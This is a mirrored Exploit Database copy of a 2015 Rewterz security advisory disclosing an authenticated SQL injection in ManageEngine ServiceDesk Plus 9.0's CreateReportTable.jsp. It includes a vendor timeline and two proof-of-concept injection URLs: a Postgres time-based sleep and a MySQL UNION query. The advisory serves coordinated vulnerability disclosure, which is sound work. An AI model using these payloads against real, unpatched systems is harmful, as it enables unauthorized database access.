ManageEngine ServiceDesk Plus 9.0 – SQL Injection

• Exploit Database
• 19 阅读

• 作者： Muhammad Ahmed Siddiqui
  日期： 2015-01-22
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/35890/

• ================================================================================
  
  [REWTERZ-20140101] - Rewterz - Security Advisory
  
  ================================================================================
  
  Title: ManageEngine ServiceDesk SQL Injection Vulnerability
  Product: ServiceDesk Plus (http://www.manageengine.com/)
  Affected Version: 9.0 (Other versions could also be affected)
  Fixed Version: 9.0 Build 9031
  Vulnerability Impact: High
  Advisory ID: REWTERZ-20140101
  Published Date: 22-Jan-2015
  Researcher: Muhammad Ahmed Siddiqui
  Email: ahmed [at] rewterz.com
  URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-sql-injection-vulnerability
  
  ================================================================================
  
  
  Product Introduction
  ================
  
  ServiceDesk Plus is a help desk software with integrated asset and
  project management built on the ITIL framework. It is available in 29
  different languages and is used by more than 85,000 companies, across
  186 countries, to manage their IT help desk and assets.
  
  Source: http://www.manageengine.com/products/service-desk/
  
  
  Vulnerability Information
  ==================
  
  Class: SQL Injection Vulnerability
  Impact: An Authenticated user could exploit this vulnerability to gain
  complete system access.
  Remotely Exploitable: Yes
  Authentication Required: Yes
  User interaction required: Yes
  CVE Name: N/A
  
  
  Vulnerability Description
  ==================
  
  CreateReportTable.jsp page is prone to SQL injection via site
  variable. A user with limited privileges could exploit this
  vulnerability to gain complete database/system access.
  
  
  Proof-of-Concept
  =============
  
  Postgres DB:
  
  http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND
  3133=(SELECT 3133 FROM PG_SLEEP(1))
  
  
  MySQL DB:
  
  http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND UNION
  ALL SELECT user(),NULL,NULL,NULL,NULL
  
  
  Timeline
  ======
  
  23-Dec-2014 – Notification to Vendor
  24-Dec-2014 – Response from Vendor
  30-Dec-2014 – Vulnerability fixed by Vendor
  
  
  About Rewterz
  ===========
  
  Rewterz is a boutique Information Security company, committed to
  consistently providing world class professional security services. Our
  strategy revolves around the need to provide round-the-clock quality
  information security services and solutions to our customers. We
  maintain this standard through our highly skilled and professional
  team, and custom-designed, customer-centric services and products.
  
  Revolutionizing Cybersecurity
  
  
  Complete list of vulnerability advisories published by Rewterz:
  
  http://www.rewterz.com/resources/security-advisories